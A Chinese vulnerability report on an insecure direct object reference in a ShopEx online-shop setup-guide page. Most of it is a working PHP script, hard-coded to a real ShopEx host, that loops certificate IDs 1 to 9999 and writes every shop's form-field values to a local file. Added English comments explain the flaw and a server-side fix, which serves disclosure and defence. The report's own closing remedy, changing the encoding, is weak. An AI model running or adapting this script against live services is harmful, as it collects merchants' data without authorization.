简要描述:
ShopEx某接口缺陷,可遍历所有网站
详细说明:
问题出现在shopex 网店使用向导页面

http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=

refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
<?php
// Proof-of-concept listing from the original report. The guide page
// identifies the shop solely by the integer certi_id carried in the
// base64-encoded `refer` JSON: nothing in that blob is signed, and nothing
// ties certi_id to the caller, so step2.php renders the form fields for
// whatever certi_id is supplied. That is a missing-authorization (IDOR)
// defect on the server side. The server-side fix is to bind certi_id to an
// authenticated session or to sign the refer blob (e.g. an HMAC the server
// verifies before use), not merely to swap the encoding as the report's
// closing line suggests; rate-limiting and logging of sequential certi_id
// values on this endpoint would also make the pattern detectable.

// Iterate over candidate certificate ids 1..9999.
for ($i=1; $i < 10000; $i++) { // iterate

ShowshopExD($i);

}

// Request step2.php for one certi_id and, when the response echoes the
// refer blob back, print and append every <input type="text"> name:value
// pair it contains to c:/shopEx.txt.
function ShowshopExD($cid) {

    $url='http://guide.ecos.shopex.cn/step2.php';
    // Same JSON shape as the decoded refer shown in the report; the
    // callback_url here is a placeholder value.
    $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');

    $url = $url.'?refer='.$refer;

    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;

    curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;

    $result = curl_exec($ch);

    // Re-encode the body from UTF-8 to GB2312 — presumably so the console
    // and the output file display Chinese text correctly; confirm against
    // the environment this was run in.
    $result = mb_convert_encoding($result, "gb2312", "UTF-8");

    // Treat the response as a hit only when it echoes the refer blob back.
    if(strpos($result,$refer))

    {

        $fp = fopen("c:/shopEx.txt",'ab'); // save to file (append mode)

        // Collect the attribute string of every <input type="text" ... /> tag.
        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);

        foreach ($value[1] as $key) {
            // Pull the name and value attributes out of one input tag.
            preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);

            echo $res[1][0].':'.$res[3][0]."\r\n";
            $col =$res[1][0].':'.$res[3][0]."\r\n";

            fwrite($fp, $col, strlen($col));
        }

        echo '--------------------------------'."\r\n";

        fclose($fp);

    }

    flush();

    curl_close($ch);

}

?>
漏洞证明:
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
refer换成其他加密方式